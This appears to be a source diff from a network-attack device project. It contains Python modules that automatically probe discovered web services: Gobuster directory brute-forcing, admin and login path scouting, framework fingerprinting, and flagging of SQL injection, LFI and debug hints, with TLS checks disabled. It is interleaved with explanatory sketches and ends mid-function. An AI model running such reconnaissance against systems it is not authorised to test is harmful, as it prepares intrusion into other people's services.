def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _lower_headers(headers: Dict[str, str]) -> Dict[str, str]:
out = {}
for k, v in (headers or {}).items():
if not k:
continue
out[str(k).lower()] = str(v)
return out
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = _lower_headers(headers)
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
missing_headers = []
for header in [
"x-frame-options",
"x-content-type-options",
"content-security-policy",
"referrer-policy",
]:
if header not in h:
missing_headers.append(header)
# HSTS is only meaningful on HTTPS, but the scheme is not known here, so it is flagged unconditionally.
if "strict-transport-security" not in h:
missing_headers.append("strict-transport-security")
rate_limited_hint = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
# Very cheap "issue hints"
issues = []
for s in SQLI_ERRORS:
if s in snippet:
issues.append("sqli_error_hint")
break
for s in LFI_HINTS:
if s in snippet:
issues.append("lfi_hint")
break
for s in DEBUG_HINTS:
if s in snippet:
issues.append("debug_hint")
break
cookie_names = []
if set_cookie:
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"missing_security_headers": missing_headers[:12],
"rate_limited_hint": bool(rate_limited_hint),
"issues": issues[:8],
"cookie_names": cookie_names[:12],
"server": h.get("server", ""),
"x_powered_by": h.get("x-powered-by", ""),
}
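The heuristics above are intentionally cheap string checks. The login-form part, isolated as a pure function (same markers as `_detect_signals`, no HTTP involved), behaves like this:

```python
def looks_like_login_page(body: str) -> bool:
    """A <form> containing a password input, or common login keywords in the body."""
    snippet = (body or "").lower()
    has_form = "<form" in snippet
    has_password = 'type="password"' in snippet or "type='password'" in snippet
    return (has_form and has_password) or any(
        x in snippet for x in ["login", "sign in", "connexion"]
    )
```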
class ValkyrieScout:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()  # scanner probes self-signed targets; cert checks intentionally off
def _fetch(
self,
*,
ip: str,
port: int,
scheme: str,
path: str,
timeout_s: float,
user_agent: str,
max_bytes: int,
) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
headers_out: Dict[str, str] = {}
status = 0
size = 0
body_snip = ""
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
chunk = resp.read(max_bytes)
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def _db_upsert(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
path: str,
status: int,
size: int,
response_ms: int,
content_type: str,
payload: dict,
user_agent: str,
):
try:
headers_json = json.dumps(payload, ensure_ascii=True)
except Exception:
headers_json = ""
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'valkyrie_scout', 'GET', ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
user_agent or "",
headers_json,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebScout/1.0"))
max_bytes = int(getattr(self.shared_data, "web_probe_max_bytes", 65536))
delay_s = float(getattr(self.shared_data, "valkyrie_delay_s", 0.05))
paths = getattr(self.shared_data, "valkyrie_scout_paths", None)
if not isinstance(paths, list) or not paths:
paths = DEFAULT_PATHS
# UI
self.shared_data.bjorn_orch_status = "ValkyrieScout"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
max_bytes=max_bytes,
)
# Only keep minimal info; do not store full HTML.
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
payload = {
"signals": signals,
"sample": {"status": int(status), "content_type": ctype, "rt_ms": int(elapsed_ms)},
}
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
payload=payload,
user_agent=user_agent,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"status": str(status),
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
if delay_s > 0:
time.sleep(delay_s)
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ValkyrieScout (light web scout)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="80")
args = parser.parse_args()
sd = SharedData()
act = ValkyrieScout(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": ""}
print(act.execute(args.ip, args.port, row, "ValkyrieScout"))
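The loop above drives `ProgressTracker` from `actions.bruteforce_common`, which is not part of this diff. A minimal stand-in with the same surface (hypothetical, inferred only from the `advance()`/`set_complete()` calls and the `bjorn_progress` field; the real class may differ) behaves like:

```python
# Hypothetical minimal stand-in for ProgressTracker, inferred from the
# advance()/set_complete() calls above. The real implementation lives in
# actions/bruteforce_common.py and may differ.
class FakeShared:
    bjorn_progress = ""

class ProgressTrackerSketch:
    def __init__(self, shared, total):
        self.shared = shared
        self.total = max(1, int(total))
        self.done = 0

    def advance(self, n=1):
        # Clamp and publish a percentage string for the EPD UI field.
        self.done = min(self.total, self.done + n)
        self.shared.bjorn_progress = f"{int(self.done * 100 / self.total)}%"

    def set_complete(self):
        self.done = self.total
        self.shared.bjorn_progress = "100%"

sd = FakeShared()
p = ProgressTrackerSketch(sd, 4)
p.advance(1)
p.advance(1)
print(sd.bjorn_progress)  # 50%
p.set_complete()
print(sd.bjorn_progress)  # 100%
```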

actions/web_enum.py Normal file

@@ -0,0 +1,424 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
- Writes each finding into the `webenum` table in REAL-TIME (Streaming).
- Updates bjorn_progress with actual percentage (0-100%).
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
- No filesystem output: parse Gobuster stdout/stderr directly.
- Dynamic filtering of HTTP statuses via shared_data.web_status_codes.
"""
import re
import socket
import subprocess
import threading
import logging
import time
import os
import select
from typing import List, Dict, Tuple, Optional, Set
from shared import SharedData
from logger import Logger
# -------------------- Logger & module meta --------------------
logger = Logger(name="web_enum.py", level=logging.DEBUG)
b_class = "WebEnumeration"
b_module = "web_enum"
b_status = "WebEnumeration"
b_port = 80
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_parent = None
b_priority = 9
b_cooldown = 1800
b_rate_limit = '3/86400'
b_enabled = 1
# -------------------- Defaults & parsing --------------------
DEFAULT_WEB_STATUS_CODES = [
200, 201, 202, 203, 204, 206,
301, 302, 303, 307, 308,
401, 403, 405,
"5xx",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
# Gobuster "dir" line examples handled:
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
GOBUSTER_LINE = re.compile(
r"""^(?P<path>\S+)\s*
\(Status:\s*(?P<status>\d{3})\)\s*
(?:\[Size:\s*(?P<size>\d+)\])?
(?:\s*\[\-\-\>\s*(?P<redir>[^\]]+)\])?
""",
re.VERBOSE
)
# Regex to capture Gobuster's progress output on stderr
# e.g. "Progress: 1024 / 4096 (25.00%)"
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
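Both parsers can be sanity-checked against the literal formats quoted in the comments; this standalone copy (regexes duplicated for illustration) shows the named groups they yield:

```python
# Self-contained check of the two Gobuster line formats described above.
import re

LINE = re.compile(
    r"""^(?P<path>\S+)\s*
        \(Status:\s*(?P<status>\d{3})\)\s*
        (?:\[Size:\s*(?P<size>\d+)\])?
        (?:\s*\[\-\-\>\s*(?P<redir>[^\]]+)\])?
    """,
    re.VERBOSE,
)
PROG = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")

m = LINE.match("/admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]")
print(m.group("path"), m.group("status"), m.group("size"), m.group("redir"))

p = PROG.search("Progress: 1024 / 4096 (25.00%)")
print(p.group("current"), p.group("total"))
```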
def _normalize_status_policy(policy) -> Set[int]:
"""
Convert a UI-level policy into a set of integer HTTP status codes.
"""
codes: Set[int] = set()
if not policy:
policy = DEFAULT_WEB_STATUS_CODES
for item in policy:
try:
if isinstance(item, int):
if 100 <= item <= 599:
codes.add(item)
elif isinstance(item, str):
s = item.strip().lower()
if s.endswith("xx") and len(s) == 3 and s[0].isdigit():
base = int(s[0]) * 100
codes.update(range(base, base + 100))
elif "-" in s:
a, b = s.split("-", 1)
a, b = int(a), int(b)
a, b = max(100, a), min(599, b)
if a <= b:
codes.update(range(a, b + 1))
else:
v = int(s)
if 100 <= v <= 599:
codes.add(v)
except Exception:
logger.warning(f"Ignoring invalid status code token: {item!r}")
return codes
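The token grammar accepted here (plain ints, "Nxx" families, "a-b" ranges) can be exercised with a trimmed standalone copy of the function:

```python
# Standalone sketch of the status-policy normalization used above:
# plain ints, "Nxx" family tokens, and "a-b" ranges become a set of ints.
from typing import Set

def normalize_policy(policy) -> Set[int]:
    codes: Set[int] = set()
    for item in policy or []:
        try:
            if isinstance(item, int):
                if 100 <= item <= 599:
                    codes.add(item)
            elif isinstance(item, str):
                s = item.strip().lower()
                if s.endswith("xx") and len(s) == 3 and s[0].isdigit():
                    base = int(s[0]) * 100
                    codes.update(range(base, base + 100))
                elif "-" in s:
                    a, b = (int(x) for x in s.split("-", 1))
                    a, b = max(100, a), min(599, b)
                    codes.update(range(a, b + 1))
                else:
                    v = int(s)
                    if 100 <= v <= 599:
                        codes.add(v)
        except Exception:
            pass  # invalid token: skipped (logged as a warning in the real code)
    return codes

codes = normalize_policy([200, "5xx", "301-302", "oops"])
print(sorted(codes)[:4], len(codes))
```

The "oops" token is silently dropped, mirroring the warning-and-continue behavior of `_normalize_status_policy`.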
class WebEnumeration:
"""
Orchestrates Gobuster web dir enum and writes normalized results into DB.
Streaming mode: Reads stdout/stderr in real-time for DB inserts and Progress UI.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
self.wordlist = self.shared_data.common_wordlist
self.lock = threading.Lock()
# Cache the wordlist size (used for the % computation)
self.wordlist_size = 0
self._count_wordlist_lines()
# ---- Sanity checks
self._available = True
if not os.path.exists(self.gobuster_path):
logger.error(f"Gobuster not found at {self.gobuster_path}")
self._available = False
if not os.path.exists(self.wordlist):
logger.error(f"Wordlist not found: {self.wordlist}")
self._available = False
# Policy coming from the UI: create it if missing
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
logger.info(
f"WebEnumeration initialized (Streaming Mode). "
f"Wordlist lines: {self.wordlist_size}. "
f"Policy: {self.shared_data.web_status_codes}"
)
def _count_wordlist_lines(self):
"""Compte les lignes de la wordlist une seule fois pour calculer le %."""
if self.wordlist and os.path.exists(self.wordlist):
try:
# Fast buffered read
with open(self.wordlist, 'rb') as f:
self.wordlist_size = sum(1 for _ in f)
except Exception as e:
logger.error(f"Error counting wordlist lines: {e}")
self.wordlist_size = 0
# -------------------- Utilities --------------------
def _scheme_for_port(self, port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _reverse_dns(self, ip: str) -> Optional[str]:
try:
name, _, _ = socket.gethostbyaddr(ip)
return name
except Exception:
return None
def _extract_identity(self, row: Dict) -> Tuple[str, Optional[str]]:
"""Return (mac_address, hostname) from a row with tolerant keys."""
mac = row.get("mac_address") or row.get("mac") or row.get("MAC") or ""
hostname = row.get("hostname") or row.get("Hostname") or None
return str(mac), (str(hostname) if hostname else None)
# -------------------- Filter helper --------------------
def _allowed_status_set(self) -> Set[int]:
"""Recalcule à chaque run pour refléter une mise à jour UI en live."""
try:
return _normalize_status_policy(getattr(self.shared_data, "web_status_codes", None))
except Exception as e:
logger.error(f"Failed to load shared_data.web_status_codes: {e}")
return _normalize_status_policy(DEFAULT_WEB_STATUS_CODES)
# -------------------- DB Writer --------------------
def _db_add_result(self,
mac_address: str,
ip: str,
hostname: Optional[str],
port: int,
directory: str,
status: int,
size: int = 0,
response_time: int = 0,
content_type: Optional[str] = None,
tool: str = "gobuster") -> None:
"""Upsert a single record into `webenum`."""
try:
self.shared_data.db.execute("""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
tool = COALESCE(excluded.tool, webenum.tool),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""", (mac_address, ip, hostname, int(port), directory, int(status),
int(size or 0), int(response_time or 0), content_type, tool))
logger.debug(f"DB upsert: {ip}:{port}{directory} -> {status} (size={size})")
except Exception as e:
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
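The `ON CONFLICT` clause above relies on a UNIQUE constraint over `(mac_address, ip, port, directory)`. A minimal in-memory sketch (simplified schema, assumed to match the real `webenum` table only in spirit) shows the update-on-rescan behavior:

```python
# In-memory demo of the upsert pattern used by _db_add_result: a second
# scan of the same directory updates the existing row instead of adding one.
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("""
    CREATE TABLE webenum (
        mac_address TEXT, ip TEXT, port INTEGER, directory TEXT,
        status INTEGER, size INTEGER,
        UNIQUE (mac_address, ip, port, directory)
    )
""")
sql = """
    INSERT INTO webenum (mac_address, ip, port, directory, status, size)
    VALUES (?, ?, ?, ?, ?, ?)
    ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
        status = excluded.status,
        size = excluded.size
"""
con.execute(sql, ("aa:bb", "10.0.0.5", 80, "/admin", 301, 310))
con.execute(sql, ("aa:bb", "10.0.0.5", 80, "/admin", 200, 512))  # rescan
rows = con.execute("SELECT status, size FROM webenum").fetchall()
print(rows)  # one row, updated in place
```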
# -------------------- Public API (Streaming Version) --------------------
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
"""
Run gobuster on (ip,port), STREAM stdout/stderr, upsert findings real-time.
Updates bjorn_progress with 0-100% completion.
Returns: 'success' | 'failed' | 'interrupted'
"""
if not self._available:
return 'failed'
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
scheme = self._scheme_for_port(port)
base_url = f"{scheme}://{ip}:{port}"
# Setup Initial UI
self.shared_data.comment_params = {"ip": ip, "port": str(port), "url": base_url}
self.shared_data.bjorn_orch_status = "WebEnumeration"
self.shared_data.bjorn_progress = "0%"
logger.info(f"Enumerating {base_url} (Stream Mode)...")
# Prepare Identity & Policy
mac_address, hostname = self._extract_identity(row)
if not hostname:
hostname = self._reverse_dns(ip)
allowed = self._allowed_status_set()
# Command Construction
# NOTE: Removed "--quiet" and "-z" to ensure we get Progress info on stderr
# But we use --no-color to make parsing easier
cmd = [
self.gobuster_path, "dir",
"-u", base_url,
"-w", self.wordlist,
"-t", "10", # Safe for RPi Zero
"--no-color",
"--no-progress=false", # Force progress bar even if redirected
]
process = None
findings_count = 0
stop_requested = False
# For progress calc
total_lines = self.wordlist_size if self.wordlist_size > 0 else 1
last_progress_update = 0
try:
# Merge stdout and stderr so we can read everything in one loop
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
bufsize=1,
universal_newlines=True
)
# Use select() (on Linux) so we can react quickly to stop requests
# without blocking forever on readline().
while True:
if self.shared_data.orchestrator_should_exit:
stop_requested = True
break
if process.poll() is not None:
# Process exited; drain remaining buffered output if any
line = process.stdout.readline() if process.stdout else ""
if not line:
break
else:
line = ""
if process.stdout:
if os.name != "nt":
r, _, _ = select.select([process.stdout], [], [], 0.2)
if r:
line = process.stdout.readline()
else:
# Windows: select() doesn't work on pipes; best-effort read.
line = process.stdout.readline()
if not line:
continue
# 3. Clean Line
clean_line = ANSI_RE.sub("", line).strip()
clean_line = CTL_RE.sub("", clean_line).strip()
if not clean_line:
continue
# 4. Check for Progress
if "Progress:" in clean_line:
now = time.time()
# Update UI max every 0.5s to save CPU
if now - last_progress_update > 0.5:
m_prog = GOBUSTER_PROGRESS_RE.search(clean_line)
if m_prog:
curr = int(m_prog.group("current"))
# Calculate %
pct = (curr / total_lines) * 100
pct = min(pct, 100.0)
self.shared_data.bjorn_progress = f"{int(pct)}%"
last_progress_update = now
continue
# 5. Check for Findings (Standard Gobuster Line)
m_res = GOBUSTER_LINE.match(clean_line)
if m_res:
st = int(m_res.group("status"))
# Apply Filtering Logic BEFORE DB
if st in allowed:
path = m_res.group("path")
if not path.startswith("/"):
path = "/" + path
size = int(m_res.group("size") or 0)
redir = m_res.group("redir")
# Insert into DB Immediately
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=path,
status=st,
size=size,
response_time=0,
content_type=None,
tool="gobuster"
)
findings_count += 1
# Live feedback in comments
self.shared_data.comment_params = {
"url": base_url,
"found": str(findings_count),
"last": path
}
continue
# (Optional) Log errors/unknown lines if needed
# if "error" in clean_line.lower(): logger.debug(f"Gobuster err: {clean_line}")
# End of loop
if stop_requested:
logger.info("Interrupted by orchestrator.")
return "interrupted"
self.shared_data.bjorn_progress = "100%"
return "success"
except Exception as e:
logger.error(f"Execute error on {base_url}: {e}")
if process:
try:
process.terminate()
except Exception:
pass
return "failed"
finally:
if process:
try:
if stop_requested and process.poll() is None:
process.terminate()
# Always reap the child to avoid zombies.
try:
process.wait(timeout=2)
except Exception:
try:
process.kill()
except Exception:
pass
try:
process.wait(timeout=2)
except Exception:
pass
finally:
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
except Exception as e:
logger.error(f"General execution error: {e}")
return "failed"
# -------------------- CLI mode (debug/manual) --------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
web_enum = WebEnumeration(shared_data)
logger.info("Starting web directory enumeration (CLI)...")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 80
logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
status = web_enum.execute(ip, int(port), row, "enum_web_directories")
if status == "success":
logger.success(f"Enumeration successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"Enumeration interrupted for {ip}:{port}.")
break
else:
logger.failed(f"Enumeration failed for {ip}:{port}.")
logger.info("Web directory enumeration completed.")
except Exception as e:
logger.error(f"General execution error: {e}")


@@ -0,0 +1,316 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
Goal:
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_login_profiler.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebLoginProfiler"
b_module = "web_login_profiler"
b_status = "WebLoginProfiler"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 55
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "6/86400"
b_enabled = 1
# Small curated list, cheap but high signal.
DEFAULT_PATHS = [
"/",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
"/robots.txt",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = {str(k).lower(): str(v) for k, v in (headers or {}).items()}
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
# Very cheap login form heuristics
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
# Rate limit / lockout hints
rate_limited = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
cookie_names = []
if set_cookie:
# Parse only cookie names cheaply
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
framework_hints = []
for cn in cookie_names:
l = cn.lower()
if l in {"csrftoken", "sessionid"}:
framework_hints.append("django")
elif l in {"laravel_session", "xsrf-token"}:
framework_hints.append("laravel")
elif l == "phpsessid":
framework_hints.append("php")
elif "wordpress" in l:
framework_hints.append("wordpress")
server = h.get("server", "")
powered = h.get("x-powered-by", "")
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"rate_limited_hint": bool(rate_limited),
"server": server,
"x_powered_by": powered,
"cookie_names": cookie_names[:12],
"framework_hints": sorted(set(framework_hints))[:6],
}
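The heuristics above can be condensed into a standalone sketch (reduced to auth type, login-form markers, and cookie-based framework hints) to see which signals fire on typical responses:

```python
# Condensed, standalone version of the _detect_signals heuristics:
# HTTP auth type, login-form markers, and cookie-based framework hints.
def detect(status, headers, body):
    h = {k.lower(): v for k, v in headers.items()}
    www = h.get("www-authenticate", "").lower()
    auth = None
    if status == 401 and "basic" in www:
        auth = "basic"
    elif status == 401 and "digest" in www:
        auth = "digest"
    s = body.lower()
    looks_like_login = ("<form" in s and 'type="password"' in s) or "login" in s
    cookie_names = []
    for part in h.get("set-cookie", "").split(","):
        name = part.split(";", 1)[0].split("=", 1)[0].strip()
        if name and name not in cookie_names:
            cookie_names.append(name)
    hints = set()
    for cn in cookie_names:
        if cn.lower() in {"csrftoken", "sessionid"}:
            hints.add("django")
        elif cn.lower() == "phpsessid":
            hints.add("php")
    return {"auth_type": auth, "looks_like_login": looks_like_login,
            "cookie_names": cookie_names, "framework_hints": sorted(hints)}

form_sig = detect(200, {"Set-Cookie": "sessionid=abc; Path=/, csrftoken=x"},
                  '<form method="post"><input type="password" name="pw"></form>')
basic_sig = detect(401, {"WWW-Authenticate": 'Basic realm="router"'}, "")
print(form_sig["framework_hints"], basic_sig["auth_type"])
```

Splitting `Set-Cookie` on commas is cheap but lossy (cookie values may contain commas); the real code accepts that trade-off since only names are kept.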
class WebLoginProfiler:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _db_upsert(self, *, mac: str, ip: str, hostname: str, port: int, path: str,
status: int, size: int, response_ms: int, content_type: str,
method: str, user_agent: str, headers_json: str):
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'login_profiler', ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
method or "GET",
user_agent or "",
headers_json or "",
),
)
def _fetch(self, *, ip: str, port: int, scheme: str, path: str, timeout_s: float,
user_agent: str) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
body_snip = ""
headers_out: Dict[str, str] = {}
status = 0
size = 0
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
# Read only a small chunk (Pi-friendly) for fingerprinting.
chunk = resp.read(65536) # 64KB
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebProfiler/1.0"))
paths = getattr(self.shared_data, "web_login_profiler_paths", None) or DEFAULT_PATHS
if not isinstance(paths, list):
paths = DEFAULT_PATHS
self.shared_data.bjorn_orch_status = "WebLoginProfiler"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
found_login = 0
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
